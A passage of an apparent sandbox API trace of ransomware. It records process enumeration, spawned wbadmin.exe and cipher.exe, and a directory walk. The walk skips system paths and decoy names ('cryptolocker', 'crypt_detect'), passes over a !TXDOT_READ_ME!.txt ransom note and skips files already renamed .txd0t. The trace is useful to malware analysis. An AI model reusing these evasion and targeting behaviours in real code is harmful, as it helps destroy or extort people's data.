(dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0137.820] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0137.856] GetCurrentProcessId () returned 0xf00 [0137.856] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0137.876] GetCurrentProcessId () returned 0xf00 [0137.876] GetCurrentProcess () returned 0xffffffff [0137.881] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.881] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x86c [0137.881] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0137.920] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0137.920] CloseHandle (hObject=0x86c) returned 1 [0137.920] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.936] GetCurrentProcessId () returned 0xf00 [0137.936] GetCurrentProcess () returned 0xffffffff [0137.936] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.941] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0137.942] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0137.961] GetCurrentProcessId () returned 0xf00 [0137.961] GetCurrentProcess () returned 0xffffffff [0137.961] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.961] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf24) returned 0x0 [0137.972] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0137.972] GetCurrentProcessId () returned 0xf00 [0137.972] GetCurrentProcess () returned 0xffffffff [0137.972] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.972] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6ec) returned 0x0 [0137.972] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0137.973] GetCurrentProcessId () returned 0xf00 [0137.973] GetCurrentProcess () returned 0xffffffff [0137.973] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.973] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1234) returned 0x0 [0137.973] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wbadmin.exe")) returned 1 [0137.974] GetCurrentProcessId () returned 0xf00 [0137.974] GetCurrentProcess () returned 0xffffffff [0137.974] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.974] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1208) returned 0x86c [0137.974] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wbadmin.exe" (normalized: "c:\\windows\\system32\\wbadmin.exe")) returned 0x1f [0137.974] StrStrIW (lpFirst="C:\\Windows\\System32\\wbadmin.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\wbadmin.exe" [0137.974] CloseHandle (hObject=0x86c) returned 1 [0137.974] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cipher.exe")) returned 1 [0137.975] GetCurrentProcessId () returned 0xf00 [0137.975] GetCurrentProcess () returned 0xffffffff [0137.975] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.975] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1198) returned 0x86c [0137.975] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cipher.exe" (normalized: "c:\\windows\\syswow64\\cipher.exe")) returned 0x1e [0137.975] StrStrIW (lpFirst="C:\\Windows\\SysWOW64\\cipher.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SysWOW64\\cipher.exe" [0137.975] CloseHandle (hObject=0x86c) returned 1 [0137.975] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1208, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0137.976] GetCurrentProcessId () returned 0xf00 [0137.976] GetCurrentProcess () returned 0xffffffff [0137.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.976] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x38c) returned 0x86c [0137.976] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0137.976] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0137.976] CloseHandle (hObject=0x86c) returned 1 [0137.976] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1198, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0137.978] GetCurrentProcessId () returned 0xf00 [0137.978] GetCurrentProcess () returned 0xffffffff [0137.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.978] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1130) returned 0x86c [0137.978] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0137.978] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0137.978] CloseHandle (hObject=0x86c) returned 1 [0137.978] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1198, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0137.979] CloseHandle (hObject=0x880) returned 1 [0137.979] Sleep (dwMilliseconds=0x3a98) Thread: id = 137 os_tid = 0xbec [0114.131] GetProcessHeap () returned 0xe30000 [0114.131] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x486) returned 0xee8818 [0114.131] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0114.131] StrNCatW (in: psz1="C:", psz2="\\*", cchMax=1030 | out: psz1="C:\\*") returned="C:\\*" [0114.131] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xec1ef0 [0114.131] StrCmpW (psz1="$GetCurrent", psz2=".") returned -1 [0114.131] StrCmpW (psz1="$GetCurrent", psz2="..") returned -1 [0114.131] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0114.132] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0114.132] StrNCatW (in: psz1="C:\\", psz2="$GetCurrent", cchMax=1030 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system32\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\local\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\boot\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\perflogs\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\programdata\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\drivers\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\wsus\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="crypt_detect") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="cryptolocker") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="ransomware") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\WINDOWS") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.132] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files") returned 0x0 [0114.132] GetProcessHeap () returned 0xe30000 [0114.132] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xf0daf8 [0114.132] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0114.132] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\*", cchMax=1054 | out: psz1="C:\\$GetCurrent\\*") returned="C:\\$GetCurrent\\*" [0114.132] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0114.133] StrCmpW (psz1=".", psz2=".") returned 0 [0114.133] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.133] StrCmpW (psz1="..", psz2=".") returned 1 [0114.133] StrCmpW (psz1="..", psz2="..") returned 0 [0114.133] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0114.133] StrCmpW (psz1="Logs", psz2=".") returned 1 [0114.133] StrCmpW (psz1="Logs", psz2="..") returned 1 [0114.133] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0114.133] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0114.133] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="Logs", cchMax=1054 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.133] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0114.133] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.133] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0114.133] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.133] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\boot\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="crypt_detect") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="cryptolocker") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="ransomware") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.134] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0114.134] GetProcessHeap () returned 0xe30000 [0114.134] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a8) returned 0x68410a0 [0114.134] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.134] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\*", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\*") returned="C:\\$GetCurrent\\Logs\\*" [0114.134] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e70 [0114.134] StrCmpW (psz1=".", psz2=".") returned 0 [0114.134] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.134] StrCmpW (psz1="..", psz2=".") returned 1 [0114.134] StrCmpW (psz1="..", psz2="..") returned 0 [0114.134] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57eac7c9, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57eac7c9, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57eac7c9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.134] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.134] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.134] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt") returned="C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt" [0114.135] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.135] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.135] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x58050289, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa8b2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.txd0t", cAlternateFileName="DOWNLE~1.TXD")) returned 1 [0114.135] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log.txd0t", psz2=".") returned 1 [0114.135] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log.txd0t", psz2="..") returned 1 [0114.135] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="downlevel_2017_09_07_02_02_39_766.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t") returned="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t" [0114.135] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log.txd0t") returned=".txd0t" [0114.135] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.135] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1974, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.txd0t", cAlternateFileName="OOBE_2~1.TXD")) returned 1 [0114.135] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log.txd0t", psz2=".") returned 1 [0114.135] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log.txd0t", psz2="..") returned 1 [0114.135] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0114.135] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="oobe_2017_09_07_03_08_57_737.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t") returned="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t" [0114.136] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log.txd0t") returned=".txd0t" [0114.136] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.136] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, 